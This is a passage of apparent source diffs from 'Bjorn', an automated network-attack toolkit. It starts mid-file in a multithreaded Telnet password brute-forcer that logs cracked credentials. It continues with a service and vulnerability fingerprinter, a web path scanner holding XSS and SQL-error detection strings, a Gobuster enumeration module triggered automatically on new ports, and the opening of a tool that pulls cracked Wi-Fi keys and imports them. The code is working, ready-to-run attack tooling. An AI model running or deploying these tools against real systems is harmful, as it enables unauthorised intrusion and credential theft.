if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

214
actions/thor_hammer.py Normal file
View File

@@ -0,0 +1,214 @@
# Service fingerprinting and version detection tool for vulnerability identification.
# Saves settings in `/home/bjorn/.settings_bjorn/thor_hammer_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target Target IP or hostname to scan (overrides saved value).
# -p, --ports Ports to scan (default: common ports, comma-separated).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/services).
# -d, --delay Delay between probes in seconds (default: 1).
# -v, --verbose Enable verbose output for detailed service information.
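# Example (assumed invocation):
#   python3 thor_hammer.py -t 192.168.1.50 -p 22,80,443 -v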
import os
import json
import socket
import argparse
import threading
from datetime import datetime
import logging
from concurrent.futures import ThreadPoolExecutor
import subprocess
b_class = "ThorHammer"
b_module = "thor_hammer"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/services"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "thor_hammer_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 53, 80, 110, 115, 139, 143, 194, 443, 445, 1433, 3306, 3389, 5432, 5900, 8080]
# Service signature database
SERVICE_SIGNATURES = {
21: {
'name': 'FTP',
'vulnerabilities': {
'vsftpd 2.3.4': 'Backdoor command execution',
'ProFTPD 1.3.3c': 'Remote code execution'
}
},
22: {
'name': 'SSH',
'vulnerabilities': {
'OpenSSH 5.3': 'Username enumeration',
'OpenSSH 7.2p1': 'User enumeration timing attack'
}
},
# Add more signatures as needed
}
class ThorHammer:
def __init__(self, target, ports=None, output_dir=DEFAULT_OUTPUT_DIR, delay=1, verbose=False):
self.target = target
self.ports = ports or DEFAULT_PORTS
self.output_dir = output_dir
self.delay = delay
self.verbose = verbose
self.results = {
'target': target,
'timestamp': datetime.now().isoformat(),
'services': {}
}
self.lock = threading.Lock()
def probe_service(self, port):
"""Probe a specific port for service information."""
try:
# Initial connection test
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.delay)
result = sock.connect_ex((self.target, port))
if result == 0:
service_info = {
'port': port,
'state': 'open',
'service': None,
'version': None,
'vulnerabilities': []
}
# Get service banner
try:
banner = sock.recv(1024).decode('utf-8', errors='ignore').strip()
service_info['banner'] = banner
except:
service_info['banner'] = None
# Advanced service detection using nmap if available
try:
nmap_output = subprocess.check_output(
['nmap', '-sV', '-p', str(port), '-T4', self.target],
stderr=subprocess.DEVNULL
).decode()
# Parse nmap output
for line in nmap_output.split('\n'):
if str(port) in line and 'open' in line:
service_info['service'] = line.split()[2]
if len(line.split()) > 3:
service_info['version'] = ' '.join(line.split()[3:])
except:
pass
# Check for known vulnerabilities
if port in SERVICE_SIGNATURES:
sig = SERVICE_SIGNATURES[port]
service_info['service'] = service_info['service'] or sig['name']
if service_info['version']:
for vuln_version, vuln_desc in sig['vulnerabilities'].items():
if vuln_version.lower() in service_info['version'].lower():
service_info['vulnerabilities'].append({
'version': vuln_version,
'description': vuln_desc
})
with self.lock:
self.results['services'][port] = service_info
if self.verbose:
logging.info(f"Service detected on port {port}: {service_info['service']}")
sock.close()
except Exception as e:
logging.error(f"Error probing port {port}: {e}")
def save_results(self):
"""Save scan results to a JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(self.output_dir, f"service_scan_{timestamp}.json")
with open(filename, 'w') as f:
json.dump(self.results, f, indent=4)
logging.info(f"Results saved to {filename}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the service scanning and fingerprinting process."""
logging.info(f"Starting service scan on {self.target}")
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.probe_service, self.ports)
self.save_results()
return self.results
def save_settings(target, ports, output_dir, delay, verbose):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"ports": ports,
"output_dir": output_dir,
"delay": delay,
"verbose": verbose
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Service fingerprinting and vulnerability detection tool")
parser.add_argument("-t", "--target", help="Target IP or hostname")
parser.add_argument("-p", "--ports", help="Ports to scan (comma-separated)")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-d", "--delay", type=float, default=1, help="Delay between probes")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
settings = load_settings()
target = args.target or settings.get("target")
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
output_dir = args.output or settings.get("output_dir")
delay = args.delay or settings.get("delay")
verbose = args.verbose or settings.get("verbose")
if not target:
logging.error("Target is required. Use -t or save it in settings")
return
save_settings(target, ports, output_dir, delay, verbose)
scanner = ThorHammer(
target=target,
ports=ports,
output_dir=output_dir,
delay=delay,
verbose=verbose
)
scanner.execute()
if __name__ == "__main__":
main()
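Besides the CLI entry point, the class can be driven directly; a small sketch with placeholder target and ports:

# Sketch: drive the scanner programmatically (placeholder target/ports).
scanner = ThorHammer(target="192.168.1.50", ports=[22, 80], delay=0.5, verbose=True)
results = scanner.execute()
for port, info in results["services"].items():
    print(port, info.get("service"), info.get("version"))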

313
actions/valkyrie_scout.py Normal file
View File

@@ -0,0 +1,313 @@
# Web application scanner for discovering hidden paths and vulnerabilities.
# Saves settings in `/home/bjorn/.settings_bjorn/valkyrie_scout_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -u, --url Target URL to scan (overrides saved value).
# -w, --wordlist Path to directory wordlist (default: built-in list).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/webscan).
# -t, --threads Number of concurrent threads (default: 10).
# -d, --delay Delay between requests in seconds (default: 0.1).
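# Example (assumed invocation):
#   python3 valkyrie_scout.py -u http://192.168.1.50 -t 20 -d 0.2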
import os
import json
import requests
import argparse
from datetime import datetime
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin
import re
from bs4 import BeautifulSoup
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/webscan"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "valkyrie_scout_settings.json")
# Common web vulnerabilities to check
VULNERABILITY_PATTERNS = {
'sql_injection': [
"error in your SQL syntax",
"mysql_fetch_array",
"ORA-",
"PostgreSQL",
],
'xss': [
"<script>alert(1)</script>",
"javascript:alert(1)",
],
'lfi': [
"include(",
"require(",
"include_once(",
"require_once(",
]
}
class ValkyrieScout:
def __init__(self, url, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, delay=0.1):
self.base_url = url.rstrip('/')
self.wordlist = wordlist
self.output_dir = output_dir
self.threads = threads
self.delay = delay
        self.discovered_paths = []  # list of result dicts (dicts are unhashable, so a set would raise TypeError)
self.vulnerabilities = []
self.forms = []
self.session = requests.Session()
self.session.headers = {
'User-Agent': 'Valkyrie Scout Web Scanner',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
self.lock = threading.Lock()
def load_wordlist(self):
"""Load directory wordlist."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r') as f:
return [line.strip() for line in f if line.strip()]
return [
'admin', 'wp-admin', 'administrator', 'login', 'wp-login.php',
'upload', 'uploads', 'backup', 'backups', 'config', 'configuration',
'dev', 'development', 'test', 'testing', 'staging', 'prod',
'api', 'v1', 'v2', 'beta', 'debug', 'console', 'phpmyadmin',
'mysql', 'database', 'db', 'wp-content', 'includes', 'tmp', 'temp'
]
def scan_path(self, path):
"""Scan a single path for existence and vulnerabilities."""
url = urljoin(self.base_url, path)
try:
response = self.session.get(url, allow_redirects=False)
if response.status_code in [200, 301, 302, 403]:
with self.lock:
                    self.discovered_paths.append({
'path': path,
'url': url,
'status_code': response.status_code,
'content_length': len(response.content),
'timestamp': datetime.now().isoformat()
})
# Scan for vulnerabilities
self.check_vulnerabilities(url, response)
# Extract and analyze forms
self.analyze_forms(url, response)
except Exception as e:
logging.error(f"Error scanning {url}: {e}")
def check_vulnerabilities(self, url, response):
"""Check for common vulnerabilities in the response."""
try:
content = response.text.lower()
for vuln_type, patterns in VULNERABILITY_PATTERNS.items():
for pattern in patterns:
if pattern.lower() in content:
with self.lock:
self.vulnerabilities.append({
'type': vuln_type,
'url': url,
'pattern': pattern,
'timestamp': datetime.now().isoformat()
})
# Additional checks
self.check_security_headers(url, response)
self.check_information_disclosure(url, response)
except Exception as e:
logging.error(f"Error checking vulnerabilities for {url}: {e}")
def analyze_forms(self, url, response):
"""Analyze HTML forms for potential vulnerabilities."""
try:
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
for form in forms:
form_data = {
'url': url,
'method': form.get('method', 'get').lower(),
'action': urljoin(url, form.get('action', '')),
'inputs': [],
'timestamp': datetime.now().isoformat()
}
# Analyze form inputs
for input_field in form.find_all(['input', 'textarea']):
input_data = {
'type': input_field.get('type', 'text'),
'name': input_field.get('name', ''),
'id': input_field.get('id', ''),
'required': input_field.get('required') is not None
}
form_data['inputs'].append(input_data)
with self.lock:
self.forms.append(form_data)
except Exception as e:
logging.error(f"Error analyzing forms in {url}: {e}")
def check_security_headers(self, url, response):
"""Check for missing or misconfigured security headers."""
security_headers = {
'X-Frame-Options': 'Missing X-Frame-Options header',
'X-XSS-Protection': 'Missing X-XSS-Protection header',
'X-Content-Type-Options': 'Missing X-Content-Type-Options header',
'Strict-Transport-Security': 'Missing HSTS header',
'Content-Security-Policy': 'Missing Content-Security-Policy'
}
for header, message in security_headers.items():
if header not in response.headers:
with self.lock:
self.vulnerabilities.append({
'type': 'missing_security_header',
'url': url,
'detail': message,
'timestamp': datetime.now().isoformat()
})
def check_information_disclosure(self, url, response):
"""Check for information disclosure in response."""
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'internal_ip': r'\b(?:192\.168|10\.\d{1,3}|172\.(?:1[6-9]|2[0-9]|3[01]))\.\d{1,3}\.\d{1,3}\b',  # 10.x prefix needs its own octet so full addresses match
'debug_info': r'(?:stack trace|debug|error|exception)',
'version_info': r'(?:version|powered by|built with)'
}
content = response.text.lower()
for info_type, pattern in patterns.items():
matches = re.findall(pattern, content, re.IGNORECASE)
if matches:
with self.lock:
self.vulnerabilities.append({
'type': 'information_disclosure',
'url': url,
'info_type': info_type,
'findings': matches,
'timestamp': datetime.now().isoformat()
})
def save_results(self):
"""Save scan results to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
# Save discovered paths
if self.discovered_paths:
paths_file = os.path.join(self.output_dir, f"paths_{timestamp}.json")
with open(paths_file, 'w') as f:
json.dump(list(self.discovered_paths), f, indent=4)
# Save vulnerabilities
if self.vulnerabilities:
vulns_file = os.path.join(self.output_dir, f"vulnerabilities_{timestamp}.json")
with open(vulns_file, 'w') as f:
json.dump(self.vulnerabilities, f, indent=4)
# Save form analysis
if self.forms:
forms_file = os.path.join(self.output_dir, f"forms_{timestamp}.json")
with open(forms_file, 'w') as f:
json.dump(self.forms, f, indent=4)
logging.info(f"Results saved to {self.output_dir}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the web application scan."""
try:
logging.info(f"Starting web scan on {self.base_url}")
paths = self.load_wordlist()
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.scan_path, paths)
self.save_results()
except Exception as e:
logging.error(f"Scan error: {e}")
finally:
self.session.close()
def save_settings(url, wordlist, output_dir, threads, delay):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"url": url,
"wordlist": wordlist,
"output_dir": output_dir,
"threads": threads,
"delay": delay
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Web application vulnerability scanner")
parser.add_argument("-u", "--url", help="Target URL to scan")
parser.add_argument("-w", "--wordlist", help="Path to directory wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests")
args = parser.parse_args()
settings = load_settings()
url = args.url or settings.get("url")
wordlist = args.wordlist or settings.get("wordlist")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
delay = args.delay or settings.get("delay")
if not url:
logging.error("URL is required. Use -u or save it in settings")
return
save_settings(url, wordlist, output_dir, threads, delay)
scanner = ValkyrieScout(
url=url,
wordlist=wordlist,
output_dir=output_dir,
threads=threads,
delay=delay
)
scanner.execute()
if __name__ == "__main__":
main()

364
actions/web_enum.py Normal file
View File

@@ -0,0 +1,364 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
- Writes each finding into the `webenum` table
- ON CONFLICT(mac_address, ip, port, directory) DO UPDATE
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit)
- No filesystem output: parse Gobuster stdout directly
- Dynamic HTTP status filtering via shared_data.web_status_codes
"""
import re
import socket
import subprocess
import threading
import logging
from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData
from logger import Logger
# -------------------- Logger & module meta --------------------
logger = Logger(name="web_enum.py", level=logging.DEBUG)
b_class = "WebEnumeration"
b_module = "web_enum"
b_status = "WebEnumeration"
b_port = 80
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None
b_priority = 9
b_cooldown = 1800
b_rate_limit = '3/86400'
b_enabled = 1
# -------------------- Defaults & parsing --------------------
# Fallback value used if the UI has not yet initialized shared_data.web_status_codes
# (default: the useful 2xx codes, 3xx, 401/403/405 and every 5xx; 429 is not included)
DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308,
401, 403, 405,
"5xx",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
# Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
# /images (Status: 200) [Size: 12345]
GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s*
(?:\[Size:\s*(?P<size>\d+)\])?
(?:\s*\[\-\-\>\s*(?P<redir>[^\]]+)\])?
""",
re.VERBOSE
)
def _normalize_status_policy(policy) -> Set[int]:
"""
Transforme une politique "UI" en set d'entiers HTTP.
policy peut contenir:
- int (ex: 200, 403)
- "xXX" (ex: "2xx", "5xx")
- "a-b" (ex: "500-504")
"""
codes: Set[int] = set()
if not policy:
policy = DEFAULT_WEB_STATUS_CODES
for item in policy:
try:
if isinstance(item, int):
if 100 <= item <= 599:
codes.add(item)
elif isinstance(item, str):
s = item.strip().lower()
if s.endswith("xx") and len(s) == 3 and s[0].isdigit():
base = int(s[0]) * 100
codes.update(range(base, base + 100))
elif "-" in s:
a, b = s.split("-", 1)
a, b = int(a), int(b)
a, b = max(100, a), min(599, b)
if a <= b:
codes.update(range(a, b + 1))
else:
v = int(s)
if 100 <= v <= 599:
codes.add(v)
except Exception:
logger.warning(f"Ignoring invalid status code token: {item!r}")
return codes
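# Illustrative example: _normalize_status_policy([200, "3xx", "500-502"])
# -> {200} | {300..399} | {500, 501, 502}; invalid tokens are logged and skipped.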
class WebEnumeration:
"""
Orchestrates Gobuster web dir enum and writes normalized results into DB.
In-memory only: no CSV, no temp files.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock()
# ---- Sanity checks
import os
if not os.path.exists(self.gobuster_path):
raise FileNotFoundError(f"Gobuster not found at {self.gobuster_path}")
if not os.path.exists(self.wordlist):
raise FileNotFoundError(f"Wordlist not found: {self.wordlist}")
# Policy coming from the UI: create it if absent
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info(
f"WebEnumeration initialized (stdout mode, no files). "
f"Using status policy: {self.shared_data.web_status_codes}"
)
# -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _reverse_dns(self, ip: str) -> Optional[str]:
try:
name, _, _ = socket.gethostbyaddr(ip)
return name
except Exception:
return None
def _extract_identity(self, row: Dict) -> Tuple[str, Optional[str]]:
"""Return (mac_address, hostname) from a row with tolerant keys."""
mac = row.get("mac_address") or row.get("mac") or row.get("MAC") or ""
hostname = row.get("hostname") or row.get("Hostname") or None
return str(mac), (str(hostname) if hostname else None)
# -------------------- Filter helper --------------------
def _allowed_status_set(self) -> Set[int]:
"""Recalcule à chaque run pour refléter une mise à jour UI en live."""
try:
return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
except Exception as e:
logger.error(f"Failed to load shared_data.web_status_codes: {e}")
return _normalize_status_policy(DEFAULT_WEB_STATUS_CODES)
# -------------------- DB Writer --------------------
def _db_add_result(self,
mac_address: str,
ip: str,
hostname: Optional[str],
port: int,
directory: str,
status: int,
size: int = 0,
response_time: int = 0,
content_type: Optional[str] = None,
tool: str = "gobuster") -> None:
"""Upsert a single record into `webenum`."""
try:
self.shared_data.db.execute("""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
tool = COALESCE(excluded.tool, webenum.tool),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""", (mac_address, ip, hostname, int(port), directory, int(status),
int(size or 0), int(response_time or 0), content_type, tool))
logger.debug(f"DB upsert: {ip}:{port}{directory} -> {status} (size={size})")
except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
# -------------------- Gobuster runner (stdout) --------------------
def _run_gobuster_stdout(self, url: str) -> Optional[str]:
base_cmd = [
self.gobuster_path, "dir",
"-u", url,
"-w", self.wordlist,
"-t", "10",
"--quiet",
"--no-color",
# If your gobuster version supports it, you can already cut the noise at the source:
# "-b", "404,429",
]
def run(cmd):
return subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# Try with -z first
cmd = base_cmd + ["-z"]
logger.info(f"Running Gobuster on {url}...")
try:
res = run(cmd)
if res.returncode == 0:
logger.success(f"Gobuster OK on {url}")
return res.stdout or ""
# Fallback if -z is unknown
if "unknown flag" in (res.stderr or "").lower() or "invalid" in (res.stderr or "").lower():
logger.info("Gobuster doesn't support -z, retrying without it.")
res2 = run(base_cmd)
if res2.returncode == 0:
logger.success(f"Gobuster OK on {url} (no -z)")
return res2.stdout or ""
logger.info(f"Gobuster failed on {url}: {res2.stderr.strip()}")
return None
logger.info(f"Gobuster failed on {url}: {res.stderr.strip()}")
return None
except Exception as e:
logger.error(f"Gobuster exception on {url}: {e}")
return None
def _parse_gobuster_text(self, text: str) -> List[Dict]:
"""
Parse gobuster stdout lines into entries:
{ 'path': '/admin', 'status': 301, 'size': 310, 'redirect': 'http://...'|None }
"""
entries: List[Dict] = []
if not text:
return entries
for raw in text.splitlines():
# 1) strip ANSI/control BEFORE regex
line = ANSI_RE.sub("", raw)
line = CTL_RE.sub("", line)
line = line.strip()
if not line:
continue
m = GOBUSTER_LINE.match(line)
if not m:
logger.debug(f"Unparsed line: {line}")
continue
# 2) extract all fields NOW
path = m.group("path") or ""
status = int(m.group("status"))
size = int(m.group("size") or 0)
redir = m.group("redir")
# 3) normalize path
if not path.startswith("/"):
path = "/" + path
path = "/" + path.strip("/")
entries.append({
"path": path,
"status": status,
"size": size,
"redirect": redir.strip() if redir else None
})
logger.info(f"Parsed {len(entries)} entries from gobuster stdout")
return entries
# -------------------- Public API --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
"""
Run gobuster on (ip,port), parse stdout, upsert each finding into DB.
Returns: 'success' | 'failed' | 'interrupted'
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted before start (orchestrator flag).")
return "interrupted"
scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}"
logger.info(f"Enumerating {base_url} ...")
self.shared_data.bjornorch_status = "WebEnumeration"
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted before gobuster run.")
return "interrupted"
stdout_text = self._run_gobuster_stdout(base_url)
if stdout_text is None:
return "failed"
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted after gobuster run (stdout captured).")
return "interrupted"
entries = self._parse_gobuster_text(stdout_text)
if not entries:
logger.warning(f"No entries for {base_url}.")
return "success" # scan ran fine but no findings
# ---- Dynamic filtering based on shared_data.web_status_codes
allowed = self._allowed_status_set()
pre = len(entries)
entries = [e for e in entries if e["status"] in allowed]
post = len(entries)
if post < pre:
preview = sorted(list(allowed))[:10]
logger.info(
f"Filtered out {pre - post} entries not in policy "
f"{preview}{'...' if len(allowed) > 10 else ''}."
)
mac_address, hostname = self._extract_identity(row)
if not hostname:
hostname = self._reverse_dns(ip)
for e in entries:
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=e["path"],
status=e["status"],
size=e.get("size", 0),
response_time=0, # gobuster doesn't expose timing here
content_type=None, # unknown here; a later HEAD/GET probe can fill it
tool="gobuster"
)
return "success"
except Exception as e:
logger.error(f"Execute error on {ip}:{port}: {e}")
return "failed"
# -------------------- CLI mode (debug/manual) --------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
web_enum = WebEnumeration(shared_data)
logger.info("Starting web directory enumeration...")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"Enumeration interrupted for {ip}:{port}.")
break
else:
logger.failed(f"Enumeration failed for {ip}:{port}.")
logger.info("Web directory enumeration completed.")
except Exception as e:
logger.error(f"General execution error: {e}")

317
actions/wpasec_potfiles.py Normal file
View File

@@ -0,0 +1,317 @@
# wpasec_potfiles.py
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
import os
import json
import glob
import argparse
import requests
import subprocess
from datetime import datetime
import logging
# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
b_class = "WPAsecPotfileManager"
b_module = "wpasec_potfiles"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "wifi"
b_name = "WPAsec Potfile Manager"
b_description = (
"Download, clean, import, or erase Wi-Fi networks from WPAsec potfiles. "
"Options: download (default if API key is set), clean, import, erase."
)
b_author = "Infinition"
b_version = "1.0.0"
b_icon = f"/actions_icons/{b_class}.png"
b_docs_url = "https://wpa-sec.stanev.org/?api"
b_args = {
"key": {
"type": "text",
"label": "API key (WPAsec)",
"placeholder": "wpa-sec api key",
"secret": True,
"help": "API key used to download the potfile. If empty, the saved key is reused."
},
"directory": {
"type": "text",
"label": "Potfiles directory",
"default": "/home/bjorn/Bjorn/data/input/potfiles",
"placeholder": "/path/to/potfiles",
"help": "Directory containing/receiving .pot / .potfile files."
},
"clean": {
"type": "checkbox",
"label": "Clean potfiles directory",
"default": False,
"help": "Delete all files in the potfiles directory."
},
"import_potfiles": {
"type": "checkbox",
"label": "Import potfiles into NetworkManager",
"default": False,
"help": "Add Wi-Fi networks found in potfiles via nmcli (avoiding duplicates)."
},
"erase": {
"type": "checkbox",
"label": "Erase Wi-Fi connections from potfiles",
"default": False,
"help": "Delete via nmcli the Wi-Fi networks listed in potfiles (avoiding duplicates)."
}
}
b_examples = [
{"directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"key": "YOUR_API_KEY_HERE", "directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "import_potfiles": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "erase": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True, "import_potfiles": True},
]
def compute_dynamic_b_args(base: dict) -> dict:
"""
Enrich dynamic UI arguments:
- Pre-fill the API key if previously saved.
- Show info about the number of potfiles in the chosen directory.
"""
d = dict(base or {})
try:
settings_path = os.path.join(
os.path.expanduser("~"), ".settings_bjorn", "wpasec_settings.json"
)
if os.path.exists(settings_path):
with open(settings_path, "r", encoding="utf-8") as f:
saved = json.load(f)
saved_key = (saved or {}).get("api_key")
if saved_key and not d.get("key", {}).get("default"):
d.setdefault("key", {}).setdefault("default", saved_key)
d["key"]["help"] = (d["key"].get("help") or "") + " (auto-detected)"
except Exception:
pass
try:
directory = d.get("directory", {}).get("default") or "/home/bjorn/Bjorn/data/input/potfiles"
exists = os.path.isdir(directory)
count = 0
if exists:
count = len(glob.glob(os.path.join(directory, "*.pot"))) + \
len(glob.glob(os.path.join(directory, "*.potfile")))
